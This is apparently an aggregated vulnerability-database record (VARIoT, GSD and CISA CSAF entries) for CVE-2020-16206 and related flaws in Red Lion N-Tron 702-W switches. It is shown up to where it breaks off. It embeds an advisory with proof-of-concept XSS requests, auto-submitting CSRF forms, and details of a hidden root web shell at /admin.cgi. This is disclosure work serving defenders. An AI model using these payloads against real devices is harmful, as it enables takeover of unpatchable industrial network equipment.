"confidentialityImpact": "High", "exploitabilityScore": null, "id": "JVNDB-2020-010486", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "Low", "scope": "Changed", "trust": 0.8, "userInteraction": "Required", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2020-16206", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "JVNDB-2020-010486", "trust": 0.8, "value": "Critical" }, { "author": "CNVD", "id": "CNVD-2020-49664", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-202008-1371", "trust": 0.6, "value": "CRITICAL" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-49664" }, { "db": "JVNDB", "id": "JVNDB-2020-010486" }, { "db": "CNNVD", "id": "CNNVD-202008-1371" }, { "db": "NVD", "id": "CVE-2020-16206" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The affected product is vulnerable to stored cross-site scripting, which may allow an attacker to remotely execute arbitrary code to gain access to sensitive data on the N-Tron 702-W / 702M12-W (all versions). N-Tron 702-W and 702M12-W Exists in a cross-site scripting vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Red Lion N-Tron 702-W/702M12-W is a high-voltage Ethernet switch product. \n\r\n\r\nRed Lion N-Tron 702-W/702M12-W has a cross-site scripting vulnerability. SEC Consult Vulnerability Lab Security Advisory \u003c 20200902-0 \u003e\n=======================================================================\n title: Multiple Vulnerabilities\n product: Red Lion N-Tron 702-W, Red Lion N-Tron 702M12-W\n vulnerable version: \u003c=2.0.26\n fixed version:\n CVE number: CVE-2020-16210, CVE-2020-16206, CVE-2020-16208,\n CVE-2020-16204\n impact: High\n homepage: https://www.redlion.net/\n found: 2020-02-28\n by: T. Weber (Office Vienna)\n SEC Consult Vulnerability Lab\n\n An integrated part of SEC Consult\n Europe | Asia | North America\n\n https://www.sec-consult.com\n\n=======================================================================\n\nVendor description:\n-------------------\n\"For over forty years, customers around the world have trusted Red Lion\nControls. Our award-winning industrial automation and\nnetworking solutions provide critical information and controls to\nimprove productivity, working with numerous devices and diverse\nprotocols to access data.\"\n\nSource: https://www.redlion.net\n\n\nBusiness recommendation:\n------------------------\nThe vendor recommends to change the hardware and use a newer product. \nSEC Consult recommends to remove the device from productive environments. An attacker is also able to perform actions in the\ncontext of the attacked user. \nSuch placed payloads cannot be detected via browser-protection mechanisms as\nthey are embedded into the web-interface. \nAn attacker is also able to perform actions in the context of the attacked user. \n\n3) Cross-Site Request Forgery (CSRF) - CVE-2020-16208\nCSRF protection is not implemented at all. \nSuch a vulnerability enables an attacker to modify different configurations of\na device by luring an authenticated user to click on a crafted link. An\nattacker is able to take over the device by exploiting this vulnerability. \n\n4) Hidden OS Web-Shell Interface - CVE-2020-16204\nAn undocumented interface, that contains a web-shell to the underlying OS, was\nfound to be present on the device. It is not referenced in the actual menu\nand is also not mentioned in the manual of the device. \nCommands can be executed as root on the device. \n\nThis endpoint seems to be a leftover of the used Atheros SDK. \n\n5) Known BusyBox Vulnerabilities\nThe used BusyBox toolkit in version 1.11.0 is outdated and contains multiple\nknown vulnerabilities. The outdated version was found by IoT Inspector. \n\n6) Outdated and Vulnerable Software Components\nOutdated and vulnerable software components were found on the device during\na quick examination. \n\nThe vulnerabilities 1), 2), 3), 4) and 5) were manually verified on an emulated\ndevice by using the MEDUSA scalable firmware runtime. \n\n\nProof of concept:\n-----------------\n1) Reflected Cross-Site Scripting (XSS) - CVE-2020-16210\nThe \"pingtest_action.cgi\" endpoint can be used to trigger reflected XSS. \nhttp://$IP/pingtest_action.cgi?action=pingtest\u0026dst_ip_addr=1\u0026dst_addr_select=127.0.0.1\u0026lines=%3Chtml%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3C/html%3E\n\n2) Stored Cross-Site Scripting (XSS) - CVE-2020-16206\nInjection of a XSS payload is possible on multiple endpoints. An example\nfor permanent XSS on the endpoint \"/network.cgi\" is the following request:\n-------------------------------------------------------------------------------\nPOST /network.cgi HTTP/1.1\nHost: $IP\nAccept-Encoding: gzip, deflate\nContent-Type: multipart/form-data; boundary=---------------------------195698564115308644282115103021\nContent-Length: 915\nAuthorization: Basic YWRtaW46YWRtaW4=\nConnection: close\nCookie: ui_language=en_US\nUpgrade-Insecure-Requests: 1\n\n-----------------------------195698564115308644282115103021\nContent-Disposition: form-data; name=\"netmode\"\n\nbridge\n-----------------------------195698564115308644282115103021\nContent-Disposition: form-data; name=\"wlanipmode\"\n\n0\n-----------------------------195698564115308644282115103021\nContent-Disposition: form-data; name=\"brip\"\n\n192.168.1.202\n-----------------------------195698564115308644282115103021\nContent-Disposition: form-data; name=\"brmask\"\n\n255.255.255.0\n-----------------------------195698564115308644282115103021\nContent-Disposition: form-data; name=\"brgw\"\n\n192.168.1.1\"\u003e\u003cscript\u003ealert(document.location)\u003c/script\u003e\n-----------------------------195698564115308644282115103021\nContent-Disposition: form-data; name=\"dns1\"\n\n\n-----------------------------195698564115308644282115103021\nContent-Disposition: form-data; name=\"dns2\"\n\n\n-----------------------------195698564115308644282115103021--\n-------------------------------------------------------------------------------\n\nThis can also be embedded in the HTML code as shown below:\n-------------------------------------------------------------------------------\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://$IP/network.cgi\" method=\"POST\" enctype=\"multipart/form-data\"\u003e\n \u003cinput type=\"hidden\" name=\"netmode\" value=\"bridge\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlanipmode\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"brip\" value=\"192\u0026#46;168\u0026#46;1\u0026#46;202\" /\u003e\n \u003cinput type=\"hidden\" name=\"brmask\" value=\"255\u0026#46;255\u0026#46;255\u0026#46;0\" /\u003e\n \u003cinput type=\"hidden\" name=\"brgw\" value=\"192\u0026#46;168\u0026#46;1\u0026#46;1\u0026quot;\u0026gt;\u0026lt;script\u0026gt;alert\u0026#40;document\u0026#46;location\u0026#43;\u0026quot;\u0026#32;\u0026gt;\u0026#32;SEC\u0026#45;Consult\u0026quot;\u0026#41;\u0026lt;\u0026#47;script\u0026gt;\" /\u003e\n \u003cinput type=\"hidden\" name=\"dns1\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"dns2\" value=\"\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n-------------------------------------------------------------------------------\n\n3) Cross-Site Request Forgery (CSRF) - CVE-2020-16208\nCSRF can be triggered on each endpoint as the whole web-interface does not\nimplement any protection mechanisms. Changing the hostname to \"SEC Consult\" can\nbe done with the following embedded HTML code:\n-------------------------------------------------------------------------------\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://$IP/system.cgi\" method=\"POST\" enctype=\"multipart/form-data\"\u003e\n \u003cinput type=\"hidden\" name=\"hostname\" value=\"SEC\u0026#32;Consult\" /\u003e\n \u003cinput type=\"hidden\" name=\"action\" value=\"chhost\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n-------------------------------------------------------------------------------\n\n4) Hidden OS Web-Shell Interface - CVE-2020-16204\nThe endpoint \"/admin.cgi\" is not referenced within the whole web-interface and\nalso not documented in the manual. By browsing this endpoint, multiple actions\ncan be natively triggered:\n * Execute commands in context of the root user\n * Upload files\n * Download files\n * Change access rights\nAll other actions can be done via the command execution. The lack of CSRF\nprotections allows attackers to execute commands on the device by luring a\nuser on malicious web-pages. \n\n5) Known BusyBox Vulnerabilities\nThe BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on\nan emulated device:\n\nA file with the name \"\\ectest\\n\\e]55;test.txt\\a\" was created to trigger the\nvulnerability. \n-------------------------------------------------------------------------------\n# ls \"pressing \u003cTAB\u003e\"\ntest\n55\\;test.txt\n#\n-------------------------------------------------------------------------------\n\n6) Outdated Software Components\nBy analyzing the firmware a lot of components are found to be outdated:\n * BusyBox 1.0.1\n * PHP/FI 2.0.1\n * Dnsmasq 2.35\n * Boa 0.93.15\n\nVulnerable / tested versions:\n-----------------------------\nthe following firmware version has been tested:\n* Red Lion N-Tron 702-W / 2.0.26\n* Red Lion N-Tron 702M12-W / 2.0.26\n\n\nVendor contact timeline:\n------------------------\n2020-03-09: Contacting vendor through support.emea@redlion.net; No answer. \n2020-03-17: Asked for status update; No answer. \n2020-03-30: Asked for status update, added incoming.ics-cert@redlion.net to\n the list of recipients; No answer. \n2020-04-13: Requested support for coordination from CERT@VDE for the advisory. \n Sent the advisory to the CERT. \n2020-04-14: Security contact from CERT@VDE answered, that ICS-CERT was also in-\n formed. \n2020-07-17: Asked contact at ICS-CERT for status update; Contact stated that\n they are waiting for an update of Red Lion. \n2020-08-20: Received CISA draft for an advisory from CERT@VDE. \n2020-08-28: Found the published advisory on CISA\u0027s website* which was released\n on 2020-08-27. \n2020-09-02: Release of security advisory. \n\n* https://us-cert.cisa.gov/ics/advisories/icsa-20-240-01\n\nSolution:\n---------\nUpgrade to newer hardware. \n\n\nWorkaround:\n-----------\nNone. \n\n\nAdvisory URL:\n-------------\nhttps://www.sec-consult.com/en/vulnerability-lab/advisories/index.html\n\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nSEC Consult Vulnerability Lab\n\nSEC Consult\nEurope | Asia | North America\n\nAbout SEC Consult Vulnerability Lab\nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It\nensures the continued knowledge gain of SEC Consult in the field of network\nand application security to stay ahead of the attacker. The SEC Consult\nVulnerability Lab supports high-quality penetration testing and the evaluation\nof new offensive and defensive technologies for our customers. Hence our\ncustomers obtain the most current information about vulnerabilities and valid\nrecommendation about the risk profile of new technologies. \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nInterested to work with the experts of SEC Consult?\nSend us your application https://www.sec-consult.com/en/career/index.html\n\nInterested in improving your cyber security with the experts of SEC Consult?\nContact our local offices https://www.sec-consult.com/en/contact/index.html\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nMail: research at sec-consult dot com\nWeb: https://www.sec-consult.com\nBlog: http://blog.sec-consult.com\nTwitter: https://twitter.com/sec_consult\n\nEOF T. Weber / @2020\n\n\n", "sources": [ { "db": "NVD", "id": "CVE-2020-16206" }, { "db": "JVNDB", "id": "JVNDB-2020-010486" }, { "db": "CNVD", "id": "CNVD-2020-49664" }, { "db": "PACKETSTORM", "id": "159064" } ], "trust": 2.25 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2020-16206", "trust": 3.1 }, { "db": "ICS CERT", "id": "ICSA-20-240-01", "trust": 3.1 }, { "db": "PACKETSTORM", "id": "159064", "trust": 1.7 }, { "db": "JVN", "id": "JVNVU90721897", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2020-010486", "trust": 0.8 }, { "db": "CNVD", "id": "CNVD-2020-49664", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2020.2973", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-202008-1371", "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-49664" }, { "db": "JVNDB", "id": "JVNDB-2020-010486" }, { "db": "PACKETSTORM", "id": "159064" }, { "db": "CNNVD", "id": "CNNVD-202008-1371" }, { "db": "NVD", "id": "CVE-2020-16206" } ] }, "id": "VAR-202009-0592", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2020-49664" } ], "trust": 1.6 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-49664" } ] }, "last_update_date": "2024-11-23T20:19:06.891000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Top Page", "trust": 0.8, "url": "https://www.redlion.net/" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2020-010486" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-79", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2020-010486" }, { "db": "NVD", "id": "CVE-2020-16206" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.7, "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-240-01" }, { "trust": 1.6, "url": "http://seclists.org/fulldisclosure/2020/sep/6" }, { "trust": 1.6, "url": "http://packetstormsecurity.com/files/159064/red-lion-n-tron-702-w-702m12-w-2.0.26-xss-csrf-shell.html" }, { "trust": 1.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-16206" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-16206" }, { "trust": 0.8, "url": "https://jvn.jp/vu/jvnvu90721897/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.2973/" }, { "trust": 0.1, "url": "https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html" }, { "trust": 0.1, "url": "https://twitter.com/sec_consult" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-16210" }, { "trust": 0.1, "url": "https://www.redlion.net" }, { "trust": 0.1, "url": "https://www.sec-consult.com" }, { "trust": 0.1, "url": "http://$ip/pingtest_action.cgi?action=pingtest\u0026dst_ip_addr=1\u0026dst_addr_select=127.0.0.1\u0026lines=%3chtml%3e%3cscript%3ealert(document.location)%3c/script%3e%3c/html%3e" }, { "trust": 0.1, "url": "http://$ip/network.cgi\"" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-16208" }, { "trust": 0.1, "url": "http://$ip/system.cgi\"" }, { "trust": 0.1, "url": "https://www.redlion.net/" }, { "trust": 0.1, "url": "https://www.sec-consult.com/en/contact/index.html" }, { "trust": 0.1, "url": "http://blog.sec-consult.com" }, { "trust": 0.1, "url": "https://www.sec-consult.com/en/career/index.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-16204" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-49664" }, { "db": "JVNDB", "id": "JVNDB-2020-010486" }, { "db": "PACKETSTORM", "id": "159064" }, { "db": "CNNVD", "id": "CNNVD-202008-1371" }, { "db": "NVD", "id": "CVE-2020-16206" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2020-49664" }, { "db": "JVNDB", "id": "JVNDB-2020-010486" }, { "db": "PACKETSTORM", "id": "159064" }, { "db": "CNNVD", "id": "CNNVD-202008-1371" }, { "db": "NVD", "id": "CVE-2020-16206" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-08-31T00:00:00", "db": "CNVD", "id": "CNVD-2020-49664" }, { "date": "2021-01-20T08:59:18", "db": "JVNDB", "id": "JVNDB-2020-010486" }, { "date": "2020-09-03T23:32:32", "db": "PACKETSTORM", "id": "159064" }, { "date": "2020-08-27T00:00:00", "db": "CNNVD", "id": "CNNVD-202008-1371" }, { "date": "2020-09-01T21:15:12.177000", "db": "NVD", "id": "CVE-2020-16206" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-08-31T00:00:00", "db": "CNVD", "id": "CNVD-2020-49664" }, { "date": "2021-01-20T08:59:18", "db": "JVNDB", "id": "JVNDB-2020-010486" }, { "date": "2020-09-07T00:00:00", "db": "CNNVD", "id": "CNNVD-202008-1371" }, { "date": "2024-11-21T05:06:56.110000", "db": "NVD", "id": "CVE-2020-16206" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-202008-1371" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "N-Tron 702-W and 702M12-W Cross-site scripting vulnerability in", "sources": [ { "db": "JVNDB", "id": "JVNDB-2020-010486" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "XSS", "sources": [ { "db": "CNNVD", "id": "CNNVD-202008-1371" } ], "trust": 0.6 } }
gsd-2020-16206
Vulnerability from gsd
{ "GSD": { "alias": "CVE-2020-16206", "description": "The affected product is vulnerable to stored cross-site scripting, which may allow an attacker to remotely execute arbitrary code to gain access to sensitive data on the N-Tron 702-W / 702M12-W (all versions).", "id": "GSD-2020-16206", "references": [ "https://packetstormsecurity.com/files/cve/CVE-2020-16206" ] }, "gsd": { "metadata": { "exploitCode": "unknown", "remediation": "unknown", "reportConfidence": "confirmed", "type": "vulnerability" }, "osvSchema": { "aliases": [ "CVE-2020-16206" ], "details": "The affected product is vulnerable to stored cross-site scripting, which may allow an attacker to remotely execute arbitrary code to gain access to sensitive data on the N-Tron 702-W / 702M12-W (all versions).", "id": "GSD-2020-16206", "modified": "2023-12-13T01:21:46.527649Z", "schema_version": "1.4.0" } }, "namespaces": { "cve.org": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2020-16206", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "N-Tron 702-W / 702M12-W", "version": { "version_data": [ { "version_value": "Versions prior to all versions" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "The affected product is vulnerable to stored cross-site scripting, which may allow an attacker to remotely execute arbitrary code to gain access to sensitive data on the N-Tron 702-W / 702M12-W (all versions)." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "IMPROPER NEUTRALIZATION OF INPUT DURING WEB PAGE GENERATION (\u2018CROSS-SITE SCRIPTING\u2019) CWE-79" } ] } ] }, "references": { "reference_data": [ { "name": "https://us-cert.cisa.gov/ics/advisories/icsa-20-240-01", "refsource": "MISC", "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-240-01" }, { "name": "20200902 SEC Consult SA-20200902-0 :: Multiple Vulnerabilities in Red Lion N-Tron 702-W, Red Lion N-Tron 702M12-W", "refsource": "FULLDISC", "url": "http://seclists.org/fulldisclosure/2020/Sep/6" }, { "name": "http://packetstormsecurity.com/files/159064/Red-Lion-N-Tron-702-W-702M12-W-2.0.26-XSS-CSRF-Shell.html", "refsource": "MISC", "url": "http://packetstormsecurity.com/files/159064/Red-Lion-N-Tron-702-W-702M12-W-2.0.26-XSS-CSRF-Shell.html" } ] } }, "nvd.nist.gov": { "configurations": { "CVE_data_version": "4.0", "nodes": [ { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:redlion:n-tron_702-w_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:redlion:n-tron_702-w:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:redlion:n-tron_702m12-w_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:redlion:n-tron_702m12-w:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" } ] }, "cve": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2020-16206" }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "en", "value": "The affected product is vulnerable to stored cross-site scripting, which may allow an attacker to remotely execute arbitrary code to gain access to sensitive data on the N-Tron 702-W / 702M12-W (all versions)." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "en", "value": "CWE-79" } ] } ] }, "references": { "reference_data": [ { "name": "https://us-cert.cisa.gov/ics/advisories/icsa-20-240-01", "refsource": "MISC", "tags": [ "Third Party Advisory", "US Government Resource" ], "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-240-01" }, { "name": "20200902 SEC Consult SA-20200902-0 :: Multiple Vulnerabilities in Red Lion N-Tron 702-W, Red Lion N-Tron 702M12-W", "refsource": "FULLDISC", "tags": [ "Exploit", "Mailing List", "Third Party Advisory" ], "url": "http://seclists.org/fulldisclosure/2020/Sep/6" }, { "name": "http://packetstormsecurity.com/files/159064/Red-Lion-N-Tron-702-W-702M12-W-2.0.26-XSS-CSRF-Shell.html", "refsource": "MISC", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/159064/Red-Lion-N-Tron-702-W-702M12-W-2.0.26-XSS-CSRF-Shell.html" } ] } }, "impact": { "baseMetricV2": { "acInsufInfo": false, "cvssV2": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "LOW", "userInteractionRequired": true }, "baseMetricV3": { "cvssV3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.0, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 6.0 } }, "lastModifiedDate": "2022-10-14T20:59Z", "publishedDate": "2020-09-01T21:15Z" } } }
icsa-20-240-01
Vulnerability from csaf_cisa
Notes
{ "document": { "acknowledgments": [ { "names": [ "Thomas Weber" ], "organization": "SEC Consult Vulnerability Lab", "summary": "reporting these vulnerabilities to CISA" } ], "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Disclosure is not limited", "tlp": { "label": "WHITE", "url": "https://us-cert.cisa.gov/tlp/" } }, "lang": "en-US", "notes": [ { "category": "general", "text": "This CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: central@cisa.dhs.gov", "title": "CISA Disclaimer" }, { "category": "legal_disclaimer", "text": "All information products included in https://us-cert.cisa.gov/ics are provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained within. DHS does not endorse any commercial product or service, referenced in this product or otherwise. Further dissemination of this product is governed by the Traffic Light Protocol (TLP) marking in the header. For more information about TLP, see https://us-cert.cisa.gov/tlp/.", "title": "Legal Notice" }, { "category": "summary", "text": "Successful exploitation of these vulnerabilities could allow an attacker to gain unauthorized access to sensitive information, execute system commands, and perform actions in the context of an attacked user.", "title": "Risk evaluation" }, { "category": "other", "text": "Commercial Facilities, Energy, Transportation Systems, Water and Wastewater Systems", "title": "Critical infrastructure sectors" }, { "category": "other", "text": "Worldwide", "title": "Countries/areas deployed" }, { "category": "other", "text": "United States", "title": "Company headquarters location" }, { "category": "general", "text": "CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:", "title": "Recommended Practices" }, { "category": "general", "text": "CISA also recommends users take the following measures to protect themselves from social engineering attacks:", "title": "Recommended Practices" }, { "category": "general", "text": "CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\nCISA also provides a section for control systems security recommended practices on the ICS webpage onus-cert.gov. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.", "title": "Recommended Practices" }, { "category": "general", "text": "Additional mitigation guidance and recommended practices are publicly available on the ICS webpage on us-cert.gov in the Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.", "title": "Recommended Practices" }, { "category": "other", "text": "No known public exploits specifically target these vulnerabilities.", "title": "Exploitability" } ], "publisher": { "category": "coordinator", "contact_details": "Email: CISAservicedesk@cisa.dhs.gov;\n Toll Free: 1-888-282-0870", "name": "CISA", "namespace": "https://www.cisa.gov/" }, "references": [ { "category": "self", "summary": "ICS Advisory ICSA-20-240-01 JSON", "url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/OT/white/2020/icsa-20-240-01.json" }, { "category": "self", "summary": "ICS Advisory ICSA-20-240-01 Web Version", "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-20-240-01" }, { "category": "external", "summary": "Recommended Practices", "url": "https://www.us-cert.gov/ncas/tips/ST04-014" }, { "category": "external", "summary": "Recommended Practices", "url": "https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" }, { "category": "external", "summary": "Recommended Practices", "url": "https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B" } ], "title": "Red Lion N-Tron 702-W, 702M12-W", "tracking": { "current_release_date": "2020-08-27T00:00:00.000000Z", "generator": { "engine": { "name": "CISA CSAF Generator", "version": "1.0.0" } }, "id": "ICSA-20-240-01", "initial_release_date": "2020-08-27T00:00:00.000000Z", "revision_history": [ { "date": "2020-08-27T00:00:00.000000Z", "legacy_version": "Initial", "number": "1", "summary": "ICSA-20-240-01 Red Lion N-Tron 702-W, 702M12-W" } ], "status": "final", "version": "1" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version", "name": "vers:all/*", "product": { "name": "N-Tron 702M12-W: All versions", "product_id": "CSAFPID-0001" } } ], "category": "product_name", "name": "N-Tron 702M12-W" }, { "branches": [ { "category": "product_version", "name": "vers:all/*", "product": { "name": "N-Tron 702-W: All versions", "product_id": "CSAFPID-0002" } } ], "category": "product_name", "name": "N-Tron 702-W" } ], "category": "vendor", "name": "Red Lion, AutomationDirect" } ] }, "vulnerabilities": [ { "cve": "CVE-2020-16210", "cwe": { "id": "CWE-79", "name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)" }, "notes": [ { "category": "summary", "text": "The affected product is vulnerable to reflected cross-site scripting, which may allow an attacker to remotely execute arbitrary code and perform actions in the context of an attacked user.CVE-2020-16210 has been assigned to this vulnerability. A CVSS v3 base score of 9.0 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H).", "title": "Vulnerability Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002" ] }, "references": [ { "category": "external", "summary": "web.nvd.nist.gov", "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16210" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Red Lion\u0027s 702-W Series was discontinued in 2018 and cannot be updated. Red Lion recommends these products be used locally within a secure network.", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002" ] } ], "scores": [ { "cvss_v3": { "baseScore": 9.0, "baseSeverity": "CRITICAL", "vectorString": 